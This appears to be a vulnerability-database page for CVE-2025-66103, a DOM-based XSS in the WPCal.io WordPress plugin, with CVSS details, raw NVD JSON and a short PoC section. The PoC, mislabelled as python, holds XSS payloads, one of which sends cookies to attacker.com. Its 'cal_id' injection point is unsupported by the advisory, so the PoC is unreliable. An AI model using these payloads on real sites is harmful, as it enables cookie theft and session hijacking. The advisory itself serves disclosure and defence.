Security Vulnerability Report
中文
CVE-2025-66103 CVSS 6.5 MEDIUM

CVE-2025-66103

Published: 2025-12-30 17:15:43
Last Modified: 2026-04-23 15:35:23
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in revmakx WPCal.io wpcal allows DOM-Based XSS.This issue affects WPCal.io: from n/a through <= 0.9.5.9.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WPCal.io插件所有版本 <= 0.9.5.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-66103 PoC - DOM-Based XSS in WPCal.io Plugin // Target: WordPress site with WPCal.io plugin <= 0.9.5.9 // Attack Vector: Inject malicious JavaScript via URL parameter const pocPayload = '<script>alert(document.cookie)</script>'; const pocUrl = 'https://target-wordpress-site.com/?cal_id=' + encodeURIComponent(pocPayload); console.log('[+] CVE-2025-66103 PoC'); console.log('[+] Target: WPCal.io Plugin <= 0.9.5.9'); console.log('[+] Vulnerability: DOM-Based XSS'); console.log('[+] Malicious URL:', pocUrl); // Alternative payload for session hijacking const sessionHijackPayload = `<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">`; // Payload to redirect user const redirectPayload = `<script>window.location.href='https://attacker-controlled-site.com'</script>`; console.log('[+] Payload 1: Cookie Theft'); console.log('[+] Payload 2: Session Hijacking'); console.log('[+] Payload 3: Redirection Attack'); console.log('\n[!] Note: This PoC is for educational and authorized testing purposes only.');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66103", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:43.210", "lastModified": "2026-04-23T15:35:22.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in revmakx WPCal.io wpcal allows DOM-Based XSS.This issue affects WPCal.io: from n/a through <= 0.9.5.9."}, {"lang": "es", "value": "Neutralización Inadecuada de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Revmakx WPCal.Io permite XSS basado en DOM. Este problema afecta a WPCal.Io: desde n/a hasta 0.9.5.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpcal/vulnerability/wordpress-wpcal-io-plugin-0-9-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.